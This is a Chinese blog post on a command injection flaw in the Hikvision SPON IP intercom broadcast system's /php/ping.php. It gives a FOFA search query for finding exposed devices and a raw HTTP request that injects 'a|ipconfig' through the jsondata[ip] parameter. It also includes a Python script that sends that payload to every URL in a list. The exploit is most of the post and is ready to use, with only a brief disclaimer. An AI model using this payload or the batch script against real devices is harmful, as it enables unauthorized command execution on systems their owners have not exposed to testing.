devbox
菜鸟追梦旅行
这个屌丝很懒,什么也没留下!
关注作者
热门标签
热门文章
当前位置:   article > 正文

Hikvision SPON IP网络对讲广播系统命令执行漏洞

作者:菜鸟追梦旅行 | 2024-02-28 10:44:55

Hikvision SPON IP网络对讲广播系统命令执行漏洞

声明
本文仅用于技术交流,请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。

1.漏洞描述

Hikvision Intercom Broadcasting System是中国海康威视(Hikvision)公司的一个对讲广播系统。Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK)版本存在操作系统命令注入漏洞,该漏洞源于文件/php/ping.php的参数jsondata[ip]会导致操作系统命令注入。

2.影响版本

海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE

3.fofa查询语句

icon_hash="-1830859634"

4.漏洞复现 

  1. POST /php/ping.php HTTP/1.1
  2. User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
  3. Accept-Encoding: gzip, deflate
  4. Accept: */*
  5. Connection: close
  6. Host: 
  7. Content-Length: 40
  8. Content-Type: application/x-www-form-urlencoded
  9.  
  10. jsondata[ip]=a|ipconfig&jsondata[type]=1

tips:这里的图有点问题,转码这个好像是他服务器的原因,我试过yakit和bp都是这样,而且我从来没改过这两软件的编码配置。

5.POC批量检测脚本

  1. import argparse
  2. import time
  3. import requests
  4. parser = argparse.ArgumentParser(description='Hikvision SPON IP网络对讲广播系统命令执行')
  5. parser.add_argument('-f',help='Batch detection file name',type=str)
  6. args = parser.parse_args()
  7. file = args.f
  8. def get_url(file):
  9.     with open('{}'.format(file),'r',encoding='utf-8') as f:
  10.         for i in f:
  11.             i = i.replace('\n', '')
  12.             send_req("http://"+i)
  13. def send_req(url_check):
  14.     print('{} runing Check'.format(url_check))
  15.     url = url_check + '/php/ping.php'
  16.     header = {
  17.         'User-Agent':'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)',
  18.         'Accept-Encoding': 'gzip, deflate',
  19.         'Accept': '*/*',
  20.         'Connection': 'close',
  21.         'Content-Length': '40',
  22.         'Content-Type': 'application/x-www-form-urlencoded'
  23.     }
  24.     data = (
  25.         "jsondata[ip]=a|ipconfig&jsondata[type]=1"
  26.     )
  27.     try:
  28.         requests.packages.urllib3.disable_warnings()
  29.         response = requests.post(url=url,headers=header,data=data,timeout=3)
  30.         if response.status_code == 200 and 'Windows IP' in response.text:
  31.             print('存在Hikvision SPON IP网络对讲广播系统命令执行漏洞,请尽快修复漏洞!!!')
  32.  
  33.     except Exception as e:
  34.         print(e)
  35.         pass
  36. if __name__ == '__main__':
  37.     if file is None:
  38.         print('请在当前目录下新建需要检测的url.txt')
  39.     else:
  40.         get_url(file)

用法

python ./Hikvision SPON IP网络对讲广播系统命令执行.py -f ./url.txt 

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/菜鸟追梦旅行/article/detail/158550
推荐阅读
相关标签

Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。

  

闽ICP备14008679号